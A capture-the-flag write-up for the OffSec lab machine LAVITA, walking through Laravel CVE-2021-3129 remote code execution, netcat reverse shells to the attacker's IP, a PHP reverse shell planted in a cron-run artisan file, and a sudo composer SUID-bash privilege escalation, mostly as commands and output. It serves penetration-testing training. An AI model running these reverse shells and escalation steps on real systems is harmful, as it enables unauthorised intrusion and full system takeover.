Summary #
We can login using SSH with the provided credentials or exploit the Laravel 8.4.0 framework once APP_DEBUG is set to true, and get initial access as the www-data user. The skunk user runs as script every minute: /usr/bin/php /var/www/html/lavita/artisan clear:pictures which we can abuse to get access as the skunk user. Once this user we can run the /usr/bin/composer binary with sudo privileges without a password. Editing the /var/www/html/lavita/composer.json file as the www-data user and running the command as the skunk user, escalates our privileges to the root user.
Specifications #
- Name: LAVITA
- Platform: PG PRACTICE
- Points: 10
- Difficulty: Intermediate
- System overview: Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux
- IP address: 192.168.127.38
- OFFSEC provided credentials:
skunk:OffSecSkunk0401 - HASH:
local.txt:f38f2f9e1a94f89dd81171dce75daf42 - HASH:
proof.txt:92747eac90cba34df8708c04160c3ca6
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir lavita && cd lavita && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Aug 22 14:57 .
drwxrwxr-x 37 kali kali 4096 Aug 22 14:57 ..
drwxrwxr-x 2 kali kali 4096 Aug 22 14:57 enum
drwxrwxr-x 2 kali kali 4096 Aug 22 14:57 exploits
drwxrwxr-x 2 kali kali 4096 Aug 22 14:57 files
drwxrwxr-x 2 kali kali 4096 Aug 22 14:57 tools
drwxrwxr-x 2 kali kali 4096 Aug 22 14:57 uploads
## set bash variable
ip=192.168.127.38
## ping target to check if it's online
ping $ip
PING 192.168.127.38 (192.168.127.38) 56(84) bytes of data.
64 bytes from 192.168.127.38: icmp_seq=1 ttl=61 time=18.8 ms
64 bytes from 192.168.127.38: icmp_seq=2 ttl=61 time=19.6 ms
^C
--- 192.168.127.38 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 18.756/19.187/19.619/0.431 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.127.38:22
Open 192.168.127.38:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 14:58 CEST
Initiating Ping Scan at 14:58
Scanning 192.168.127.38 [4 ports]
Completed Ping Scan at 14:58, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:58
Completed Parallel DNS resolution of 1 host. at 14:58, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:58
Scanning 192.168.127.38 [2 ports]
Discovered open port 80/tcp on 192.168.127.38
Discovered open port 22/tcp on 192.168.127.38
Completed SYN Stealth Scan at 14:58, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.127.38
Host is up, received echo-reply ttl 61 (0.018s latency).
Scanned at 2025-08-22 14:58:18 CEST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Copy the output of open ports into a file called ports within the files directory.
## edit the ``files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:
## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..
## output previous command
22,80
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey:
| 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDNEbgprJqVJa8R95Wkbo3cemB4fdRzos+v750LtPEnRs+IJQn5jcg5l89Tx4junU+AXzLflrMVo55gbuKeNTDtFRU9ltlIu4AU+f7lRlUlvAHlNjUbU/z3WBZ5ZU9j7Xc9WKjh1Ov7chC0UnDdyr5EGrIwlLzgk8zrWx364+S4JqLtER2/n0rhVxa9RCw0tR/oL24kMep4q7rFK6dThiRtQ9nsJFhh6yw8Fmdg7r4uohqH70UJurVwVNwFqtr/86e4VSSoITlMQPZrZFVvoSsjyL8LEODt1qznoLWudMD95Eo1YFSPID5VcS0kSElfYigjSr+9bNSdlzAof1mU6xJA67BggGNu6qITWWIJySXcropehnDAt2nv4zaKAUKc/T0ij9wkIBskuXfN88cEmZbu+gObKbLgwQSRQJIpQ+B/mA8CD4AiaTmEwGSWz1dVPp5Fgb6YVy6E4oO9ASuD9Q1JWuRmnn8uiHF/nPLs2LC2+rh3nPLXlV+MG/zUfQCrdrE=
| 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCUhhvrIBs53SApXKZYHWBlpH50KO3POt8Y+WvTvHZ5YgRagAEU5eSnGkrnziCUvDWNShFhLHI7kQv+mx+4R6Wk=
| 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN4MSEXnpONsc0ANUT6rFQPWsoVmRW4hrpSRq++xySM9
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.56 ((Debian))
|_http-title: W3.CSS Template
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial Access #
Initial Access: path 1 #
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey:
| 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDNEbgprJqVJa8R95Wkbo3cemB4fdRzos+v750LtPEnRs+IJQn5jcg5l89Tx4junU+AXzLflrMVo55gbuKeNTDtFRU9ltlIu4AU+f7lRlUlvAHlNjUbU/z3WBZ5ZU9j7Xc9WKjh1Ov7chC0UnDdyr5EGrIwlLzgk8zrWx364+S4JqLtER2/n0rhVxa9RCw0tR/oL24kMep4q7rFK6dThiRtQ9nsJFhh6yw8Fmdg7r4uohqH70UJurVwVNwFqtr/86e4VSSoITlMQPZrZFVvoSsjyL8LEODt1qznoLWudMD95Eo1YFSPID5VcS0kSElfYigjSr+9bNSdlzAof1mU6xJA67BggGNu6qITWWIJySXcropehnDAt2nv4zaKAUKc/T0ij9wkIBskuXfN88cEmZbu+gObKbLgwQSRQJIpQ+B/mA8CD4AiaTmEwGSWz1dVPp5Fgb6YVy6E4oO9ASuD9Q1JWuRmnn8uiHF/nPLs2LC2+rh3nPLXlV+MG/zUfQCrdrE=
| 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCUhhvrIBs53SApXKZYHWBlpH50KO3POt8Y+WvTvHZ5YgRagAEU5eSnGkrnziCUvDWNShFhLHI7kQv+mx+4R6Wk=
| 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN4MSEXnpONsc0ANUT6rFQPWsoVmRW4hrpSRq++xySM9
Because we got credentials (skunk:OffSecSkunk0401) from OFFSEC we first try to login using SSH on TCP port 22. Connect with the following command and paste the password when asked. Once logged in we find in the root folder of the skunk user the local.txt file.
## connect via SSH using credentials
ssh skunk@$ip
The authenticity of host '192.168.127.38 (192.168.127.38)' can't be established.
ED25519 key fingerprint is SHA256:dFgkgTXNmYqIKoPgky6aPnKabkiw7Jf4aZnS4Gwv82Y.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:57: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.127.38' (ED25519) to the list of known hosts.
skunk@192.168.127.38's password:
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
-bash-5.1$
## print content current directory
-bash-5.1$ ls -la
total 24
drwxr-xr-x 2 skunk skunk 4096 Dec 8 2023 .
drwxr-xr-x 3 root root 4096 Dec 8 2023 ..
lrwxrwxrwx 1 root root 9 Dec 8 2023 bash_history -> /dev/null
-rw-r--r-- 1 skunk skunk 220 Aug 4 2021 .bash_logout
-rw-r--r-- 1 skunk skunk 3526 Aug 4 2021 .bashrc
-rw-r--r-- 1 skunk skunk 33 Aug 22 08:55 local.txt
-rw-r--r-- 1 skunk skunk 807 Aug 4 2021 .profile
## print `local.txt`
-bash-5.1$ cat local.txt
f38f2f9e1a94f89dd81171dce75daf42
Initial Access: path 2 #
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.56 ((Debian))
|_http-title: W3.CSS Template
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Apache/2.4.56 (Debian)
On port 80 there is a website running called LAVITA E BELLA.
When we visit a page that doesn’t exist, example index, we get the PHP framework name and version: Laravel 8.4.0.
When we search the internet for an existing exploit for this particular framework/version we can find a remote code execution (CVE-2021-3129): https://raw.githubusercontent.com/joshuavanderpoll/CVE-2021-3129/refs/heads/main/CVE-2021-3129.py. Let’s download and run it.
## change directory
cd exploits
## copy exploit locally
git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
## change directory into the exploit
cd CVE-2021-3129
## run the exploit
python3 CVE-2021-3129.py
_____ _____ ___ __ ___ _ _____ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |__|__ / |_ ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_, /
\___| \_/ |___| /___\__/___|_| |___/_/___|/_/
https://github.com/joshuavanderpoll/CVE-2021-3129
Using PHPGGC: https://github.com/ambionics/phpggc
[?] Enter host (e.g. https://example.com/) : http://192.168.127.38/
[@] Starting the exploit on "http://192.168.127.38/home/"...
[@] Testing vulnerable URL "http://192.168.127.38/home/_ignition/execute-solution"...
[•] The host returned status code "404". Expected 405 (Method not allowed)
[!] The host does not seem to be vulnerable. Use the "--force" parameter to bypass this check.
However, it doesn’t work because it (as written in the exploit/github) requires the APP_DEBUG is set to “true”, which it probably isn’t. So let’s use, gobuster.
## perform directory enumeration
gobuster dir -t 100 -u http://$ip:80/ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt | tee enum/raft-large-dir-raw-80
tee: enum/raft-large-dir-raw-80: No such file or directory
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.127.38:80/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.127.38/images/]
/js (Status: 301) [Size: 313] [--> http://192.168.127.38/js/]
/css (Status: 301) [Size: 314] [--> http://192.168.127.38/css/]
/logout (Status: 405) [Size: 835]
/login (Status: 200) [Size: 4916]
/register (Status: 200) [Size: 4981]
/home (Status: 302) [Size: 354] [--> http://192.168.127.38/login]
/javascript (Status: 301) [Size: 321] [--> http://192.168.127.38/javascript/]
<SNIP>
We find a register directory. Let’s register ourselves.
Once registered we can enable the APP_DEBUG functionality.
Click on Enable and try the exploit again with first the whoami command. It works. We can execute command as the www-data user. Now let’s get a reverse shell as the www-data user in the / directory.
## run the exploit
python3 CVE-2021-3129.py
_____ _____ ___ __ ___ _ _____ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |__|__ / |_ ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_, /
\___| \_/ |___| /___\__/___|_| |___/_/___|/_/
https://github.com/joshuavanderpoll/CVE-2021-3129
Using PHPGGC: https://github.com/ambionics/phpggc
[?] Enter host (e.g. https://example.com/) : http://192.168.127.38/
[@] Starting the exploit on "http://192.168.127.38/"...
[@] Testing vulnerable URL "http://192.168.127.38/_ignition/execute-solution"...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/var/www/html/lavita/storage/logs/laravel.log".
[•] Laravel version found: "8.4.0".
[•] Use "?" for a list of all available actions.
[?] Please enter a command to execute : execute whoami
[@] Executing command "whoami"...
[@] Generating payload...
<SNIP>
[√] Working chain found. You have now access to the 'patch' functionality.
[?] Would you like to try the next chain? [Y/N] : y
[@] Trying chain laravel/rce2 [2/21]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Output :
www-data
## get the local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.212/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::bef0:31a9:c52a:ea62/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## setup the listener
nc -lvnp 80
listening on [any] 80 ...
## run the exploit with the reverse shell command
python3 CVE-2021-3129.py
_____ _____ ___ __ ___ _ _____ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |__|__ / |_ ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_, /
\___| \_/ |___| /___\__/___|_| |___/_/___|/_/
https://github.com/joshuavanderpoll/CVE-2021-3129
Using PHPGGC: https://github.com/ambionics/phpggc
[?] Enter host (e.g. https://example.com/) : http://192.168.127.38/
[@] Starting the exploit on "http://192.168.127.38/"...
[@] Testing vulnerable URL "http://192.168.127.38/_ignition/execute-solution"...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/var/www/html/lavita/storage/logs/laravel.log".
[•] Laravel version found: "8.4.0".
[?] Please enter a command to execute : execute rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.212 80 >/tmp/f
<SNIP>
[√] Working chain found. You have now access to the 'patch' functionality.
[?] Would you like to try the next chain? [Y/N] : y
[@] Trying chain laravel/rce2 [2/21]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
## catch the reverse shell
nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.212] from (UNKNOWN) [192.168.127.38] 39704
/bin/sh: 0: can't access tty; job control turned off
$
## print the current user
$ whoami
www-data
## print the current working directory
$ pwd
/
## find `local.txt` on the filesystem
$ find / -iname 'local.txt' 2>/dev/null
/home/skunk/local.txt
## print `local.txt`
$ cat /home/skunk/local.txt
f38f2f9e1a94f89dd81171dce75daf42
To get a proper TTY we upgrade our shell using the script binary.
## determine location script binary
which script
/usr/bin/script
## start the script binary, after that press CTRL+Z
/usr/bin/script -qc /bin/bash /dev/null
## after this command press the `enter` key twice
stty raw -echo ; fg ; reset
## run the following to be able to clear the screen and set the terrminal correct
www-data@debian:/$ export TERM=xterm
www-data@debian:/$ stty columns 200 rows 200
Uploading and runninglinpeas.sh doesn’t reveal anything really interesting. So we download and upload pspy to the target and run it to see if there are processes running that we can abuse. Go to: https://github.com/DominicBreuker/pspy, click on releases and select pspy64. Move the file to the uploads directory, startup a local webserver and on the target, download pspy64 and run it.
## change directory
cd uploads
## move the file from the local downloads directory to the uploads directory
mv ~/Downloads/pspy64 .
## get the local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.212/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::bef0:31a9:c52a:ea62/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## start a local webserver
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
## on the target
## change directory
www-data@debian:/$ cd /var/tmp
www-data@debian:/var/tmp$
## download pspy64 using wget
www-data@debian:/var/tmp$ wget http://192.168.45.212/pspy64
--2025-08-22 10:08:19-- http://192.168.45.212/pspy64
Connecting to 192.168.45.212:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy64'
pspy64 0%[ pspy64 35%[=====================================> pspy64 92%[=================================================================================================pspy64 100%[=============================================================================================================>] 2.96M 6.74MB/s in 0.4s
2025-08-22 10:08:19 (6.74 MB/s) - 'pspy64' saved [3104768/3104768]
## set execution bit
www-data@debian:/var/tmp$ chmod +x pspy64
## run pspy64
www-data@debian:/var/tmp$ ./pspy64
The output of pspy64 shows that the skunk user (UID=1001) runs every minute: /usr/bin/php /var/www/html/lavita/artisan clear:pictures, which we own as the www-data user.
Lateral Movement #
So, we can get a reverse shell as the skunk user by overwriting this file with a PHP reverse shell command. This gives us a reverse shell as the skunk user in the /home/skunk directory.
## output pspy64
www-data@debian:/var/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
<SNIP>
2025/08/22 10:10:01 CMD: UID=1001 PID=27784 | /usr/bin/php /var/www/html/lavita/artisan clear:pictures
## print users with a shell
www-data@debian:/var/tmp$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
skunk:x:1001:1001::/home/skunk:/bin/bash
## show permissions on the file
www-data@debian:/var/tmp$ ls -la /var/www/html/lavita/artisan
-rwxr-xr-x 1 www-data www-data 1686 Nov 10 2020 /var/www/html/lavita/artisan
## get the local IP address
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 192.168.45.212/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::bef0:31a9:c52a:ea62/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
## setup listener
nc -lvnp 80
listening on [any] 80 ...
## write PHP reverse shell command to the `/var/www/html/lavita/artisan` file
echo "<?php system('busybox nc 192.168.45.212 80 -e /usr/bin/bash');?>" > /var/www/html/lavita/artisan
## catch the reverse shell
nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.212] from (UNKNOWN) [192.168.127.38] 34466
## print current user
whoami
skunk
## print current working directory
pwd
/home/skunk
To get a proper TTY we upgrade our shell using the script binary.
## determine location script binary
which script
/usr/bin/script
## start the script binary, after that press CTRL+Z
/usr/bin/script -qc /bin/bash /dev/null
## after this command press the `enter` key twice
stty raw -echo ; fg ; reset
## run the following to be able to clear the screen and set the terrminal correct
skunk@debian:~$ export TERM=xterm
skunk@debian:~$ stty columns 200 rows 200
Privilege Escalation #
As the skunk user we can run /usr/bin/composer --working-dir\=/var/www/html/lavita * with sudo privileges without a password. On GTFOBins we can find an exploit for the composer binary: https://gtfobins.github.io/gtfobins/composer/#sudo. However, when we want to change the /var/www/html/lavita/composer.json file we need to do that as the www-data user, because the skunk user has no write privileges. So switch to the www-data reverse shell and change the content of this file to set the SUID bit on the bash binary. Once set, we can escalate our privileges via the skunk user to the root user.
## print sudo privileges
skunk@debian:~$ sudo -l
Matching Defaults entries for skunk on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User skunk may run the following commands on debian:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
## print privileges on `/var/www/html/lavita/composer.json`
skunk@debian:~$ ls -la /var/www/html/lavita/composer.json
-rwxr-xr-x 1 www-data www-data 1645 Sep 14 2023 /var/www/html/lavita/composer.json
## as the `www-data` user change the content of `/var/www/html/lavita/composer.json`
www-data@debian:/var/tmp$ echo '{"scripts":{"x":"chmod +s /usr/bin/bash"}}' > /var/www/html/lavita/composer.json
## as the `skunk` user run the sudo command with the x script to set the
skunk@debian:~$ sudo -u root /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x
Do not run Composer as root/super user! See https://getcomposer.org/root for details
Continue as root/super user [yes]?
> chmod +s /usr/bin/bash
## check if the SUID bit is set, yes it is
skunk@debian:~$ ls -la /usr/bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /usr/bin/bash
## escalate privilege using the bash binary
skunk@debian:~$ bash -p
bash-5.1#
## print the current user
bash-5.1# whoami
root
## print `proof.txt`
bash-5.1# cat /root/proof.txt
92747eac90cba34df8708c04160c3ca6
References #
[+] https://raw.githubusercontent.com/joshuavanderpoll/CVE-2021-3129/refs/heads/main/CVE-2021-3129.py
[+] https://github.com/joshuavanderpoll/CVE-2021-3129.git
[+] https://github.com/DominicBreuker/pspy
[+] https://gtfobins.github.io/gtfobins/composer/#sudo